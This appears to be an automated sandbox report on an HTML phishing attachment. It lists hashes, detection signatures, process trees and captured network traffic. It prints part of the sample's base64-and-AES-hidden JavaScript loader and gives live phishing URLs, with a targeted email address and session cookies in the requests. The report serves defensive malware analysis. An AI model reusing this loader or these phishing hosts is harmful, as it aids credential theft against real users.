Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Ref_13768_448375.html

Overview

General Information

Sample name:Payment Ref_13768_448375.html
Analysis ID:1496884
MD5:8cba45889648b88dffd1e498d941580f
SHA1:d579e20b4df788b23885e8e7c4d6778b0f188a64
SHA256:1986924115fe19e2b446cd169b209a69bb2d73ff1ef93c714c11d1d8ab4d7e00
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
HTML document with suspicious name
HTML document with suspicious title
HTML page contains suspicious base64 encoded javascript
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Connects to many different domains
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Ref_13768_448375.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_618JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://7czh8.crimiti.com/3aqy/#O#Kcontact@johnsonsorthopedic.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_618, type: DROPPED
    Source: file:///C:/Users/user/Desktop/Payment%20Ref_13768_448375.htmlTab title: Payment Ref_13768_448375.html
    Source: https://7czh8.crimiti.com/3aqy/#O#Kcontact@johnsonsorthopedic.comHTTP Parser: Base64 decoded: <script>
    Source: https://guiltysociety.com/sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinianHTTP Parser: var benfcegkshewctvy = document.createelement("script");benfcegkshewctvy.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(benfcegkshewctvy);benfcegkshewctvy.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijois05wn0g1seliswlaqkv0uxlhzuparvr1y2heq3bjzdvwtlpjv0jimjc4qk93tnpdqjftzfwvvljqoxr6dk5azunprwzkczbxcnbsm1q1wxhibnjxz2dwbhrdmhrdcthqqlvpv2l4mxrubgzuemzclzdrcuyzegdsatnvvmr4t0xynm1lswnlvhkrz2rlzgdey05qqufvd0lemgxaqvdnz1vdmwxud3qrrky2z2pqmhv0ouxmtxz3yjjgavrszlrxrxr1qmfmqzjuu2q0qmjdaelqadzimdlwbjf0ujrovfrxnu40vethnuvnztr5aes4vwd5ykgrq3lsrgqrclpytesyblnjqvnrdtrmtfwvszvzvmjvm01suehqrwztekewbdjhu1vlv05knun2xc9rcfl2vupobgu3c05brgswbdzcl2y5swnwv2rkbljkqwjmrtnnytheszlywdb6z09vmvdktvwvnlbtwtzxa2drowt4ywnwc0pvwjrnckjwnje3serpc0rtwvq3ztj4ynftxc9lylf5uhhvsuzrelu0eitfcu4xse9waxdhnkpcmmrxewjgevnin2hiwwlcl05negvpylvotuxkyvwvzlfoakzpqk41zlz3a3ledjbcl3zrse9xevbob1rlk2fpz2ndww9fq3hms29kmvnorzbnqjftv3uxvxljotixbwfyze5ur3vwalftk1hmedngk1rtsdi0s0...
    Source: https://7czh8.crimiti.com/3aqy/#O#Kcontact@johnsonsorthopedic.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
    Source: file:///C:/Users/user/Desktop/Payment%20Ref_13768_448375.htmlHTTP Parser: No favicon
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlHTTP Parser: No favicon
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlHTTP Parser: No favicon
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlHTTP Parser: No favicon
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlHTTP Parser: No favicon
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlHTTP Parser: No favicon
    Source: https://www.amazon.ae/s?k=toys&_encoding=UTF8&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&crid=33DY8CRTKE0JW&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&pd_rd_w=vdKJ7&pd_rd_wg=vThym&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&sprefix=toy%2Caps%2C204&ref=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/s?k=toys&_encoding=UTF8&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&crid=33DY8CRTKE0JW&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&pd_rd_w=vdKJ7&pd_rd_wg=vThym&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&sprefix=toy%2Caps%2C204&ref=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/s?k=toys&_encoding=UTF8&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&crid=33DY8CRTKE0JW&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&pd_rd_w=vdKJ7&pd_rd_wg=vThym&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&sprefix=toy%2Caps%2C204&ref=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/s?k=toys&_encoding=UTF8&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&crid=33DY8CRTKE0JW&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&pd_rd_w=vdKJ7&pd_rd_wg=vThym&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&sprefix=toy%2Caps%2C204&ref=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: about:srcdocHTTP Parser: No favicon
    Source: about:srcdocHTTP Parser: No favicon
    Source: about:srcdocHTTP Parser: No favicon
    Source: about:srcdocHTTP Parser: No favicon
    Source: https://d1lxz4vuik53pc.cloudfront.net/ii/1722546138571/inner.htmlHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101b95cb50a3549d7cc8ae561d98f79c39c77e16df2019c81a88cec8247b57dad70&old_oo=0&ts=1724264933180&s=Ad7sBFZT9dpbLgbIWeXEcQ42dKAzLbrlW7pVsPnzhDnn&gdpr_consent=&gdpr_consent_avl=&cb=1724264933180&dcc=tHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=J3pMLAZRTHyc58-heOEAlA&a=cm&ex-pl-n-kr-new=IRLHdkT8QQmDdopez5H7UA&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=cq3isn76QX26AY3nGH8h2w&ep=ttam_T219Ay-cPciHbT10sZlYvMtc00Nbg-QF-Axe_FRr5Zjqi3fYs90pxVTWhakWZJ5eafqZOs0RWSVY45jO386G27QJN9SsYJzVzEiPPk6wivFBZpdDw_9YPuFfO_PI5PdeL0r-LeLeRIm2B923XA3BZbJWE381JkJgegRAYBishHF-L0WHmT8aFNUjB5lYsuh9jZkO_YxNhGou6zDLmKnuDc12hfqu686ADGN-u-Q2TIBOUpW6SsNkYkjmdlsD6czpJGwPUhCt8SIHW74aiaiIrLKkbD_UPc6KDfeOtBwLXt-FmOydBtL72Us4PV1J0NiKikBjiflBPpxSHtW7tuZcaMzh00uIG-EyaSECpy5jrIdjTHqWjcVgiF-vB-XoVNG8WC_EHZMxdfifQVJtc2SyyApw5XHU5Tt8OniJQOcBxZTil28L8RpIBhluemdn898-efl3BTYujuF90LXVyzVojHsDlcOlZcl8qBwSlemPrBX0YTctRXnTfqA5JDR_SJB...HTTP Parser: No favicon
    Source: https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=fw_mp_nsln_n-mediarithmics_ox_n-gg-HMT2_n-cx-HMT_n-sc_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=IgTz5rNJj6jKuBkKoRdzkOvedYx6svsXgda-hgrfpl-ATIEP-vBl36j-AAJcrI4vuDiw6yBgPVP0WSuxeSpTPIGY13hZD0HOIGCkj80JxtN8lyAl-Xbocpo8xn1lMBpL-sbT82RnPKkztV5_AMJ4dioGGEMeNRmELI9ToJSURusHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101b95cb50a3549d7cc8ae561d98f79c39c77e16df2019c81a88cec8247b57dad70&old_oo=0&ts=1724264955101&s=ATzt2ygIoVj1OFaK5iIsnIElXTOfKiAdNC3zJvFbrrTN&gdpr_consent=&gdpr_consent_avl=&cb=1724264955101HTTP Parser: No favicon
    Source: https://www.amazon.ae/l/11601212031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/11601212031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://www.amazon.ae/l/11601212031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unkHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=fw_mp_n-gg-HMT2_n-cx-HMT_nsln_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=IgTz5rNJj6jKuBkKoRdzkOvedYx6svsXgda-hgrfpl-ATIEP-vBl36j-AAJcrI4vB1Wtz-xrdm43Lv4-1KWPHQl1TNkXqIfRdlYP2IRkLLh8lyAl-Xbocpo8xn1lMBpLA2Idm2r3l9Wh0vHfv9adPzBnQeW-Z8SFJ5MBh8EiqLkHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101b95cb50a3549d7cc8ae561d98f79c39c77e16df2019c81a88cec8247b57dad70&old_oo=0&ts=1724264967928&s=AcvizPQYfDqRCEmY9XfJPPjoXqg_EFPPL5ppieK9a2Wu&gdpr_consent=&gdpr_consent_avl=&cb=1724264967928HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.5:63391 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:63424 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63475 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63578 version: TLS 1.2
    Source: Binary string: c.pdb_observe(g)}function d(){c&&g&&(c.pdb_unobserve(g),g=null)}var e=k,c=null,g=null,n=m.init(l);this.setAsin=function(e,l){l=l||{};d();c=f.get(e);a(c,l);c.loading&&b(function(b){a(b,l)});return c};this.clear=function(){d();c={};m.update(n,c)}}});g.P&&n.when("jQuery","afterLoad").register("gw-resource-logger",function(f){return{instrumentResources:function(m){var k;k=!1;if(f.isArray(m)&&!f.isEmptyObject(m)){k=!0;for(var h=0;h<m.length;h++){var l=m[h];if("id"in l&&"regex"in l&&"initiator"in l){if(!("string"=== source: chromecache_692.2.dr, chromecache_1088.2.dr
    Source: unknownNetwork traffic detected: DNS query count 67
    Source: global trafficTCP traffic: 192.168.2.5:60212 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.5:63374 -> 162.159.36.2:53
    Source: Joe Sandbox ViewIP Address: 151.101.193.16 151.101.193.16
    Source: Joe Sandbox ViewIP Address: 3.253.168.183 3.253.168.183
    Source: Joe Sandbox ViewIP Address: 151.101.1.16 151.101.1.16
    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: global trafficHTTP traffic detected: GET /sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinian HTTP/1.1Host: guiltysociety.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinian HTTP/1.1Host: guiltysociety.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?https://7CZh8.crimiti.com/3aqy/ HTTP/1.1Host: href.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+GmgovDSPBzpvFk&MD=gD7TEatm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3aqy/ HTTP/1.1Host: 7czh8.crimiti.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 7czh8.crimiti.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7czh8.crimiti.com/3aqy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZIZ2VUZkEyVHFDc2YyUjQyRVRBZ1E9PSIsInZhbHVlIjoiTWZ2aU9NRnZFNXBQUUx0N1YrbkFWbDFxeGJVUk9IVE1GMCtCOWtGMWhpRWlVeGQ4STdMRm94c0ErQ2EzemFhZ1NDdE8wYjJySE1CSlVVL2NtYjlZbjRSQ3FXS0JFcXovb09yMnQ1WEZxUHpBK0pmRGJyODhrUlZBODR3SmVjNisiLCJtYWMiOiIzOWRmODZhNmQ0ZDNjMmMwYzNhYjE1YjdkNWI3MDY3MzZlZDFlOWQ5MjY4MDJmODg3NDIyOTdhNjZhZTQ4OTMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhKRFR3amwxTUZXQWRuNzArYXFmZmc9PSIsInZhbHVlIjoiU1hvU2ZyRHg5OHY3WDR6QmlMR3dHM2pjSlNnVXd2QkhsenZjczlWWTRlTmJ5SXVYRDkwUjdoS0FNVTZvaXlzNCtXL1ZTemlqNFM5eTdrdUNHY1UvY2UzK3lBRFIxdGVvbi9DT0dkcFZObHdiVzNGQzJKdjhJRTN2NFJwdEwxWFkiLCJtYWMiOiJmODk2ODE5ZmE3OWVhYTM1Y2UzN2E5NmJiNTgyZjEzNzRkZTJmZjMzZGM0M2ZkMTQ0NTIwYmY1ODAxZDUzNjRmIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF HTTP/1.1Host: ghd.dultzman.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://7czh8.crimiti.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7czh8.crimiti.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF HTTP/1.1Host: ghd.dultzman.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
